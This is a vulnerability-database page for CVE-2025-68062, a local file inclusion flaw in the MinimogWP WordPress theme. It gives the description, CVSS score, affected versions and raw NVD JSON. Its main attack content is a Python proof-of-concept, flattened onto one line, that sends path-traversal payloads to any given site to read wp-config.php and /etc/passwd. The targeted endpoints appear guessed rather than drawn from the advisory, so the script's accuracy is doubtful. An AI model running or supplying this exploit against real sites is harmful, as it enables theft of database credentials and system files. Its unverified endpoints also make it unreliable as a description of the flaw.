Security Vulnerability Report
中文
CVE-2025-68062 CVSS 7.5 HIGH

CVE-2025-68062

Published: 2025-12-16 09:16:02
Last Modified: 2026-01-29 21:08:44

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove MinimogWP minimog allows PHP Local File Inclusion.This issue affects MinimogWP: from n/a through <= 3.9.6.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:thememove:minimogwp:*:*:*:*:*:wordpress:*:* - VULNERABLE
MinimogWP theme <= 3.9.6
MinimogWP theme: from n/a through <= 3.9.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68062 PoC - MinimogWP Theme Local File Inclusion # Target: WordPress site with MinimogWP theme <= 3.9.6 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-68062 LFI vulnerability in MinimogWP theme """ # Common MinimogWP vulnerable endpoints endpoints = [ '/wp-content/themes/minimog/template-parts/header/top-bar.php', '/wp-content/themes/minimog/assets/js/admin.js', '/wp-content/themes/minimog/customizer.php' ] # Test file inclusion with sensitive files test_files = [ '../../../../wp-config.php', '../../../../../etc/passwd', '../wp-config.php' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-68062 - MinimogWP Theme LFI") for endpoint in endpoints: for test_file in test_files: # Construct LFI payload params = { 'template': test_file, 'file': test_file } try: url = target_url.rstrip('/') + endpoint response = requests.get(url, params=params, timeout=10) # Check for successful file inclusion if 'DB_NAME' in response.text or 'root:' in response.text: print(f"[+] VULNERABLE! Found: {test_file}") print(f"[+] Endpoint: {endpoint}") return True except Exception as e: continue print("[-] Target appears not vulnerable or no valid endpoint found") return False if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68062", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:16:01.613", "lastModified": "2026-01-29T21:08:44.490", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove MinimogWP minimog allows PHP Local File Inclusion.This issue affects MinimogWP: from n/a through <= 3.9.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:thememove:minimogwp:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "3.9.6", "matchCriteriaId": "7A3E0108-DF4D-4BE3-AA1B-3FD4D0448197"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/minimog/vulnerability/wordpress-minimogwp-theme-3-9-6-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}